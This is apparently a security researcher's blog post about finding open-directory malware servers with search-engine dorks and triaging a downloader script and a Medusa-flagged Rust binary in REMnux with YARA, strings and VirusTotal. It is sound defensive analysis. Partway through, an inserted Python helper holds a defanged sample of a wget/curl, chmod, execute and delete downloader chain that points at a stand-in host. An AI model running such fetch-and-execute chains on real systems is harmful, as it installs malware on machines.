Hello, I thought about writing a blog post about searching for malware servers and analyzing the malware files they host with REMnux.
There is a big community of security researchers and malware hunters who search for malware servers and analyze malware files. You can support them by also searching for those servers and their malicious content. Additionally, you can post some findings on social media to help them: maybe a researcher can analyze a sample for you if you can't, or can create signatures for the whole community of security researchers.
Disclaimer: When doing this, it could happen that you fuck up your system or network. Please treat it with caution. I accept no liability for any damage that could occur.
Prerequisites
- A computer only for those purposes.
- REMnux, which can be downloaded here
- If running it as a VM, VMware or VirtualBox is needed
- If running it as Docker, Docker is needed
I will use the Docker version of REMnux and use it as my toolbox.
How do I start?
Well, that's a good question. To find those servers, a good starting place is to look on social media for hashtags like #opendir, #malware, #c2 and so on. This gives you a small overview of how the files could be named and which keywords could be interesting for search engines like Google, Shodan or fofa.info.
Here is a small overview of dorks and queries:
Google
intitle:"Index of" <keyword>
intitle:"Index of" bins.sh
...
intitle:index of intext:"Last modified"
intitle:"Index of" intext:"Last modified"
...
Shodan.io
"category:malware"
http.title:"Index of /"
http.title:"Directory listing for /"
Fofa.info
title="Index of /" && body=".exe"
server="SimpleHTTP/*" && title=="Directory listing for /"
server="SimpleHTTP/*" && title=="Directory listing for /" && body=".exe"
server="SimpleHTTP/*" && title=="Directory listing for /" && body=".sh"
Target malware server
Here, as an example, we see a web server with directory listing enabled. This directory contains some malicious files. To avoid getting hacked by the operators, the screenshot is cropped.
Here we see 5 interesting files; the first one I want to analyze is the file bins.sh.
Closer look at the shell script
The content of the bins.sh file looks like a downloader, which tries to download each binary on the server and tries to execute them.
For each binary it first tries to find a writable directory to download into. Then it tries to download the binary, marks it executable and runs it. After running the binary, the binary gets deleted to cover the tracks. But because the binary has already been started, the malware still remains in memory. OK, let's download one of the binaries and try to find out what we have. I downloaded the binary client-x86_64-unknown-linux-gnu into my REMnux container.
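A small triage helper for the download, chmod, execute, delete chain described above (an added example, not code from the original post or from REMnux). The sample script is constructed and defanged (hxxp scheme, .invalid domain), and the regexes are an assumption about how such downloader scripts are usually written.

```python
import re

# Constructed, defanged sample modelled on the bins.sh behaviour described above.
# It is NOT the real script: hxxp scheme and a .invalid domain so nothing resolves.
SAMPLE_SCRIPT = """\
#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget hxxp://malware-host.invalid/client-x86_64-unknown-linux-gnu; chmod +x client-x86_64-unknown-linux-gnu; ./client-x86_64-unknown-linux-gnu; rm -rf client-x86_64-unknown-linux-gnu
curl -O hxxp://malware-host.invalid/client-arm-unknown-linux-gnueabi; chmod 777 client-arm-unknown-linux-gnueabi; ./client-arm-unknown-linux-gnueabi
echo done
"""

# A download command followed by a URL; the dropped file name is the last path segment.
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp)\b.*?((?:https?|hxxps?|ftp)://([^\s'\"]+))")
# The "find a writable directory" probe: cd /tmp || cd /var/run || ...
DIR_PROBE_RE = re.compile(r"\bcd\s+(/\S*)")


def split_statements(text):
    """Break shell text into statements on newlines, ';', '&&' and '||'."""
    return [s.strip() for s in re.split(r"\n|;|&&|\|\|", text) if s.strip()]


def triage_downloader(text):
    """Report each downloaded file and whether it is chmod-ed, executed and deleted afterwards."""
    stmts = split_statements(text)
    probed_dirs = [m.group(1) for s in stmts for m in DIR_PROBE_RE.finditer(s)]
    chains = []
    for i, stmt in enumerate(stmts):
        m = DOWNLOAD_RE.search(stmt)
        if not m:
            continue
        name = m.group(3).rsplit("/", 1)[-1]
        later = stmts[i + 1:]          # only statements after the download count
        esc = re.escape(name)
        chains.append({
            "url": m.group(2),
            "file": name,
            "chmod": any(re.search(r"\bchmod\b.*\b" + esc, s) for s in later),
            "exec": any(re.search(r"(^|\s)(\./|sh\s+|bash\s+)" + esc + r"\b", s) for s in later),
            "rm": any(re.search(r"\brm\b.*\b" + esc, s) for s in later),
        })
    return {"probed_dirs": probed_dirs, "chains": chains}


if __name__ == "__main__":
    report = triage_downloader(SAMPLE_SCRIPT)
    print("writable-dir probe:", report["probed_dirs"])
    for c in report["chains"]:
        print(c["file"], "chmod=%(chmod)s exec=%(exec)s rm=%(rm)s" % c)
```

The extracted URLs and file names are what you would hash, scan with YARA and look up on VirusTotal next; a chain with exec but without rm, as in the second sample line, still deserves the same treatment.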
Closer look at the binary
Note: I neither decompile it nor do I want to use reversing tools to take it apart in detail!
With the tool called Detect-It-Easy, we see it is a Rust binary. Let's try to get some hits with YARA.
yara /usr/local/yara-rules/*_index.yar -m -s -f client-x86_64-unknown-linux-gnu
Here we see some results from the YARA scan, which tries every rule preinstalled in REMnux.
By running strings we see that the binary calls back to the same server on a different port. It looks like the binary connects back and receives commands in JSON format, possibly over UDP.
VirusTotal scan & results
Now I go on to scan the bins.sh file with vt-cli, which can be found here: https://github.com/VirusTotal/vt-cli.
A VT scan of bins.sh also gives us a base64 string. When we run the analysis we get a report back whose status is queued.
Well, let's decode the base64 string so we can view it on the VirusTotal website itself.
echo ZDMyNDFmOWU2Nzg3NzliYTI0YmM4YmMzYjczOTlhZjY6MTcwNzU3MDMzOQ== | base64 -d
d3241f9e678779ba24bc8bc3b7399af6:1707570339
The first part of the decoded base64 string is an MD5 hash, which we can use to look up the file on VirusTotal.
The entered hash redirects us to this provided link: https://www.virustotal.com/gui/file/3f19cab6ac8e62cd117c8039c793a69f311d9a131c6592bb6c2eb18c76fc7ffd
Here we see that this file is flagged as malicious, and we also see that we have found Medusa ransomware / botnet malware.
I submitted all files to VirusTotal after writing this blog post. May it help other security researchers and professionals.
I hope you like it, and you had fun 😄